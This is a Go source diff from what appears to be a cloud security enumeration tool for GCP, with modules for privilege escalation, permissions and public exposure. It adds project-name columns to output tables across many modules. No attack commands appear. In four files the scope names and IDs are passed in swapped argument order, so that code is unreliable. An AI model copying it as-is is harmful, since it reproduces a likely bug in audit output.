[]internal.TableFile // Load Balancers table - lbHeader := []string{"Name", "Type", "Scheme", "IP Address", "Port", "Region", "Risk", "Project"} + lbHeader := []string{"Name", "Type", "Scheme", "IP Address", "Port", "Region", "Risk", "Project Name", "Project"} var lbBody [][]string for _, lb := range m.LoadBalancers { lbBody = append(lbBody, []string{ @@ -160,6 +160,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L lb.Port, lb.Region, lb.RiskLevel, + m.GetProjectName(lb.ProjectID), lb.ProjectID, }) } @@ -171,7 +172,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L // SSL Policies table if len(m.SSLPolicies) > 0 { - sslHeader := []string{"Name", "Min TLS", "Profile", "Risk", "Project"} + sslHeader := []string{"Name", "Min TLS", "Profile", "Risk", "Project Name", "Project"} var sslBody [][]string for _, policy := range m.SSLPolicies { sslBody = append(sslBody, []string{ @@ -179,6 +180,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L policy.MinTLSVersion, policy.Profile, policy.RiskLevel, + m.GetProjectName(policy.ProjectID), policy.ProjectID, }) } @@ -191,7 +193,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L // Backend Services table if len(m.BackendServices) > 0 { - beHeader := []string{"Name", "Protocol", "Security Policy", "CDN", "Health Check", "Risk", "Project"} + beHeader := []string{"Name", "Protocol", "Security Policy", "CDN", "Health Check", "Risk", "Project Name", "Project"} var beBody [][]string for _, be := range m.BackendServices { cdn := "No" @@ -209,6 +211,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L cdn, be.HealthCheck, be.RiskLevel, + m.GetProjectName(be.ProjectID), be.ProjectID, }) } @@ -228,6 +231,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L lb.Name, lb.RiskLevel, strings.Join(lb.RiskReasons, "; "), + m.GetProjectName(lb.ProjectID), lb.ProjectID, }) } @@ -239,6 +243,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L policy.Name, policy.RiskLevel, strings.Join(policy.RiskReasons, "; "), + m.GetProjectName(policy.ProjectID), policy.ProjectID, }) } @@ -247,7 +252,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L if len(highRiskBody) > 0 { tables = append(tables, internal.TableFile{ Name: "lb-risks", - Header: []string{"Type", "Name", "Risk Level", "Reasons", "Project"}, + Header: []string{"Type", "Name", "Risk Level", "Reasons", "Project Name", "Project"}, Body: highRiskBody, }) } @@ -261,8 +266,13 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L output := LoadBalancersOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) } diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index baa2a29b..a5a3fa53 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -370,6 +370,7 @@ func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { // Sinks table sinksHeader := []string{ + "Project Name", "Project ID", "Sink Name", "Destination Type", @@ -403,6 +404,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) } sinksBody = append(sinksBody, []string{ + m.GetProjectName(sink.ProjectID), sink.ProjectID, sink.Name, sink.DestinationType, @@ -415,6 +417,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) // Metrics table metricsHeader := []string{ + "Project Name", "Project ID", "Metric Name", "Description", @@ -440,6 +443,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) } metricsBody = append(metricsBody, []string{ + m.GetProjectName(metric.ProjectID), metric.ProjectID, metric.Name, description, @@ -480,6 +484,11 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -488,7 +497,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go index 289eec60..e5996d4a 100644 --- a/gcp/commands/logginggaps.go +++ b/gcp/commands/logginggaps.go @@ -241,6 +241,7 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log "Resource", "Status", "Missing Logs", + "Project Name", "Project", } @@ -257,6 +258,7 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log gap.ResourceName, gap.LoggingStatus, missingLogs, + m.GetProjectName(gap.ProjectID), gap.ProjectID, }) } @@ -326,6 +328,11 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -334,7 +341,7 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 910d3eb1..46420a17 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -329,6 +329,7 @@ func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Log "Encryption", "State", "Risk", + "Project Name", "Project", } @@ -349,6 +350,7 @@ func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Log instance.TransitEncryption, instance.State, instance.RiskLevel, + m.GetProjectName(instance.ProjectID), instance.ProjectID, }) } @@ -364,8 +366,13 @@ func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Log output := MemorystoreOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) } diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index 5492f338..4afe68c9 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -728,7 +728,8 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna // Alert Policies table policiesHeader := []string{ "Policy", - "Project", + "Project Name", + "Project ID", "Enabled", "Conditions", "Notifications", @@ -744,6 +745,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna policiesBody = append(policiesBody, []string{ truncateString(p.DisplayName, 40), + m.GetProjectName(p.ProjectID), p.ProjectID, enabled, fmt.Sprintf("%d", p.ConditionCount), @@ -766,7 +768,8 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna // Notification Channels table channelsHeader := []string{ "Channel", - "Project", + "Project Name", + "Project ID", "Type", "Enabled", "Verified", @@ -785,6 +788,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna channelsBody = append(channelsBody, []string{ truncateString(c.DisplayName, 40), + m.GetProjectName(c.ProjectID), c.ProjectID, c.Type, enabled, @@ -827,7 +831,8 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna // Uptime Checks table uptimeHeader := []string{ "Check", - "Project", + "Project Name", + "Project ID", "Host", "Protocol", "Port", @@ -838,6 +843,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna for _, u := range m.UptimeChecks { uptimeBody = append(uptimeBody, []string{ truncateString(u.DisplayName, 30), + m.GetProjectName(u.ProjectID), u.ProjectID, truncateString(u.MonitoredHost, 30), u.Protocol, @@ -892,6 +898,12 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna Loot: lootFiles, } + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -900,7 +912,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/networkendpoints.go b/gcp/commands/networkendpoints.go index 97931a4b..0a072677 100644 --- a/gcp/commands/networkendpoints.go +++ b/gcp/commands/networkendpoints.go @@ -291,7 +291,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna // PSC Endpoints table if len(m.PSCEndpoints) > 0 { - header := []string{"Risk", "Name", "Region", "Network", "IP", "Target Type", "Target", "Project"} + header := []string{"Risk", "Name", "Region", "Network", "IP", "Target Type", "Target", "Project Name", "Project"} var body [][]string for _, endpoint := range m.PSCEndpoints { @@ -308,6 +308,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna endpoint.IPAddress, endpoint.TargetType, target, + m.GetProjectName(endpoint.ProjectID), endpoint.ProjectID, }) } @@ -321,7 +322,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna // Private Connections table if len(m.PrivateConnections) > 0 { - header := []string{"Risk", "Name", "Network", "Service", "Reserved Ranges", "Accessible Services", "Project"} + header := []string{"Risk", "Name", "Network", "Service", "Reserved Ranges", "Accessible Services", "Project Name", "Project"} var body [][]string for _, conn := range m.PrivateConnections { @@ -342,6 +343,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna conn.Service, ranges, services, + m.GetProjectName(conn.ProjectID), conn.ProjectID, }) } @@ -355,7 +357,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna // Service Attachments table if len(m.ServiceAttachments) > 0 { - header := []string{"Risk", "Name", "Region", "Target Service", "Accept Policy", "Connected", "Project"} + header := []string{"Risk", "Name", "Region", "Target Service", "Accept Policy", "Connected", "Project Name", "Project"} var body [][]string for _, attachment := range m.ServiceAttachments { @@ -366,6 +368,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna attachment.TargetService, attachment.ConnectionPreference, fmt.Sprintf("%d", attachment.ConnectedEndpoints), + m.GetProjectName(attachment.ProjectID), attachment.ProjectID, }) } @@ -390,6 +393,11 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -398,7 +406,7 @@ func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger interna m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/networkexposure.go b/gcp/commands/networkexposure.go index 0e23bed4..2a1c9f5d 100644 --- a/gcp/commands/networkexposure.go +++ b/gcp/commands/networkexposure.go @@ -629,7 +629,8 @@ func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal resourcesHeader := []string{ "Type", "Name", - "Project", + "Project Name", + "Project ID", "IP/FQDN", "Ports", "TLS", @@ -649,6 +650,7 @@ func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal resourcesBody = append(resourcesBody, []string{ r.ResourceType, r.ResourceName, + m.GetProjectName(r.ProjectID), r.ProjectID, truncateString(endpoint, 40), strings.Join(r.ExposedPorts, ","), @@ -660,7 +662,8 @@ func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal // Firewall exposures table firewallHeader := []string{ "Rule", - "Project", + "Project Name", + "Project ID", "Ports", "Protocol", "Target Tags", @@ -671,6 +674,7 @@ func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal for _, f := range m.FirewallExposures { firewallBody = append(firewallBody, []string{ f.RuleName, + m.GetProjectName(f.ProjectID), f.ProjectID, strings.Join(f.Ports, ","), f.Protocol, @@ -737,6 +741,12 @@ func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal Loot: lootFiles, } + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -746,7 +756,7 @@ func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 6f65c42c..23cd9e5a 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -687,7 +687,8 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal // VPC Networks table networksHeader := []string{ "Network", - "Project", + "Project Name", + "Project ID", "Routing Mode", "Subnets", "Peerings", @@ -704,6 +705,7 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal networksBody = append(networksBody, []string{ n.Name, + m.GetProjectName(n.ProjectID), n.ProjectID, n.RoutingMode, fmt.Sprintf("%d", n.SubnetCount), @@ -822,7 +824,8 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal // Cloud NAT table natHeader := []string{ "Name", - "Project", + "Project Name", + "Project ID", "Region", "Network", "NAT IPs", @@ -838,6 +841,7 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal natBody = append(natBody, []string{ nat.Name, + m.GetProjectName(nat.ProjectID), nat.ProjectID, nat.Region, m.extractNetworkName(nat.Network), @@ -933,6 +937,12 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal Loot: lootFiles, } + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -942,7 +952,7 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 2fb36706..10f4f9fc 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -137,7 +137,7 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge // Instances table if len(m.Instances) > 0 { - header := []string{"Name", "Location", "State", "Machine Type", "Service Account", "Public IP", "GPU", "Risk", "Project"} + header := []string{"Name", "Location", "State", "Machine Type", "Service Account", "Public IP", "GPU", "Risk", "Project Name", "Project"} var body [][]string for _, instance := range m.Instances { publicIP := "No" @@ -163,6 +163,7 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge publicIP, gpu, instance.RiskLevel, + m.GetProjectName(instance.ProjectID), instance.ProjectID, }) } @@ -175,7 +176,7 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge // Runtimes table if len(m.Runtimes) > 0 { - header := []string{"Name", "Location", "State", "Type", "Machine Type", "Risk", "Project"} + header := []string{"Name", "Location", "State", "Type", "Machine Type", "Risk", "Project Name", "Project"} var body [][]string for _, runtime := range m.Runtimes { body = append(body, []string{ @@ -185,6 +186,7 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge runtime.RuntimeType, runtime.MachineType, runtime.RiskLevel, + m.GetProjectName(runtime.ProjectID), runtime.ProjectID, }) } @@ -203,6 +205,7 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge instance.Name, instance.RiskLevel, strings.Join(instance.RiskReasons, "; "), + m.GetProjectName(instance.ProjectID), instance.ProjectID, }) } @@ -211,7 +214,7 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge if len(highRiskBody) > 0 { tables = append(tables, internal.TableFile{ Name: "notebook-risks", - Header: []string{"Instance", "Risk Level", "Reasons", "Project"}, + Header: []string{"Instance", "Risk Level", "Reasons", "Project Name", "Project"}, Body: highRiskBody, }) } @@ -225,8 +228,13 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge output := NotebooksOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) } diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index 1ff0c555..ee0df30d 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -269,6 +269,7 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L // Projects table projectsHeader := []string{ + "Project Name", "Project ID", "Display Name", "Parent", @@ -278,6 +279,7 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L var projectsBody [][]string for _, proj := range m.Projects { projectsBody = append(projectsBody, []string{ + m.GetProjectName(proj.ProjectID), proj.ProjectID, proj.DisplayName, proj.Parent, @@ -287,6 +289,7 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L // Ancestry table ancestryHeader := []string{ + "Project Name", "Project", "Ancestry Path", } @@ -304,6 +307,7 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) } ancestryBody = append(ancestryBody, []string{ + m.GetProjectName(projectID), projectID, strings.Join(path, " -> "), }) @@ -359,6 +363,10 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, @@ -367,7 +375,7 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L m.WrapTable, "project", // scopeType m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go index 6a7f2ac2..b3bc8fd4 100644 --- a/gcp/commands/orgpolicies.go +++ b/gcp/commands/orgpolicies.go @@ -224,6 +224,7 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log "DenyAll", "Inherit", "Security Impact", + "Project Name", "Project", } @@ -242,6 +243,7 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log orgPolicyBoolToYesNo(policy.DenyAll), orgPolicyBoolToYesNo(policy.InheritParent), impact, + m.GetProjectName(policy.ProjectID), policy.ProjectID, }) } @@ -250,6 +252,7 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log weakHeader := []string{ "Risk", "Constraint", + "Project Name", "Project", "Security Impact", "Reasons", @@ -266,6 +269,7 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log weakBody = append(weakBody, []string{ policy.RiskLevel, policy.Constraint, + m.GetProjectName(policy.ProjectID), policy.ProjectID, policy.SecurityImpact, reasons, @@ -300,6 +304,11 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -307,7 +316,7 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index 7132fc46..e946061d 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -448,7 +448,8 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log "High Priv", "Inherited", "Conditional", - "Project", + "Project Name", + "Project ID", } var summaryBody [][]string @@ -482,6 +483,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log fmt.Sprintf("%d", highPrivCount), fmt.Sprintf("%d", inheritedCount), fmt.Sprintf("%d", conditionalCount), + m.GetProjectName(ep.ProjectID), ep.ProjectID, }) } @@ -496,7 +498,8 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log "Inherited", "Source", "Condition", - "Project", + "Project Name", + "Project ID", } var detailBody [][]string @@ -523,6 +526,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log inherited, source, condition, + m.GetProjectName(perm.ResourceID), perm.ResourceID, }) } @@ -536,7 +540,8 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log "Role", "Inherited", "Condition", - "Project", + "Project Name", + "Project ID", } var highPrivBody [][]string @@ -559,6 +564,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log perm.Role, inherited, condition, + m.GetProjectName(perm.ResourceID), perm.ResourceID, }) } @@ -574,7 +580,8 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log "Permission", "Description", "Role", - "Project", + "Project Name", + "Project ID", } var dangerousBody [][]string @@ -590,6 +597,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log dpInfo.Permission, dpInfo.Description, perm.Role, + m.GetProjectName(perm.ResourceID), perm.ResourceID, }) if dpInfo.RiskLevel == "CRITICAL" { @@ -607,7 +615,8 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log "Nested Groups", "Enumerated", "Roles", - "Project", + "Project Name", + "Project ID", } var groupBody [][]string @@ -628,6 +637,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log nestedGroups, enumStatus, fmt.Sprintf("%d", len(gi.Roles)), + m.GetProjectName(gi.ProjectID), gi.ProjectID, }) } @@ -638,7 +648,8 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log "Member Email", "Member Type", "Role in Group", - "Project", + "Project Name", + "Project ID", } var groupMembersBody [][]string @@ -650,6 +661,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log member.Email, member.Type, member.Role, + m.GetProjectName(gi.ProjectID), gi.ProjectID, }) } @@ -725,6 +737,12 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log Loot: lootFiles, } + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output using HandleOutputSmart with scope support err := internal.HandleOutputSmart( "gcp", @@ -734,7 +752,7 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log m.WrapTable, "project", // scopeType m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 444cdd3e..4a0d6f3b 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -200,6 +200,7 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) "Type", "Target", "Permissions", + "Project Name", "Project", } @@ -217,6 +218,7 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) path.PrincipalType, path.TargetResource, perms, + m.GetProjectName(path.ProjectID), path.ProjectID, }) } @@ -228,6 +230,7 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) "Target", "Description", "Exploit Command", + "Project Name", "Project", } @@ -245,6 +248,7 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) path.TargetResource, path.Description, cmd, + m.GetProjectName(path.ProjectID), path.ProjectID, }) } @@ -314,6 +318,11 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) output := PrivescOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -321,7 +330,7 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/publicresources.go b/gcp/commands/publicresources.go index cfacc794..ac3d8d77 100644 --- a/gcp/commands/publicresources.go +++ b/gcp/commands/publicresources.go @@ -228,6 +228,7 @@ func (m *PublicResourcesModule) writeOutput(ctx context.Context, logger internal "Port", "Access Level", "Service Account", + "Project Name", "Project", } @@ -257,6 +258,7 @@ func (m *PublicResourcesModule) writeOutput(ctx context.Context, logger internal resource.Port, resource.AccessLevel, saDisplay, + m.GetProjectName(resource.ProjectID), resource.ProjectID, }) } @@ -326,6 +328,11 @@ func (m *PublicResourcesModule) writeOutput(ctx context.Context, logger internal Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -334,7 +341,7 @@ func (m *PublicResourcesModule) writeOutput(ctx context.Context, logger internal m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index fa40052c..12d7aa37 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -413,6 +413,7 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { // Topics table topicsHeader := []string{ + "Project Name", "Project ID", "Topic Name", "Subscriptions", @@ -447,6 +448,7 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) } topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), topic.ProjectID, topic.Name, fmt.Sprintf("%d", topic.SubscriptionCount), @@ -459,6 +461,7 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) // Subscriptions table subsHeader := []string{ + "Project Name", "Project ID", "Subscription", "Topic", @@ -498,6 +501,7 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) } subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), sub.ProjectID, sub.Name, sub.Topic, @@ -541,6 +545,11 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -549,7 +558,7 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/resourcegraph.go b/gcp/commands/resourcegraph.go index 3f2e975a..1550d722 100644 --- a/gcp/commands/resourcegraph.go +++ b/gcp/commands/resourcegraph.go @@ -582,7 +582,8 @@ func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.L assetsHeader := []string{ "Name", "Type", - "Project", + "Project Name", + "Project ID", "Location", "Updated", } @@ -605,6 +606,7 @@ func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.L assetsBody = append(assetsBody, []string{ truncateString(name, 40), truncateString(a.AssetType, 40), + m.GetProjectName(a.ProjectID), a.ProjectID, a.Location, truncateString(a.UpdateTime, 20), @@ -641,7 +643,8 @@ func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.L crossHeader := []string{ "Resource", "Type", - "Owner Project", + "Owner Project Name", + "Owner Project ID", "Accessed From", "Risk", } @@ -651,6 +654,7 @@ func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.L crossBody = append(crossBody, []string{ truncateString(m.extractResourceName(c.ResourceName), 35), truncateString(c.ResourceType, 30), + m.GetProjectName(c.OwnerProject), c.OwnerProject, strings.Join(c.AccessedFrom, ","), c.RiskLevel, @@ -703,6 +707,12 @@ func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.L Loot: lootFiles, } + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -711,7 +721,7 @@ func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.L m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff 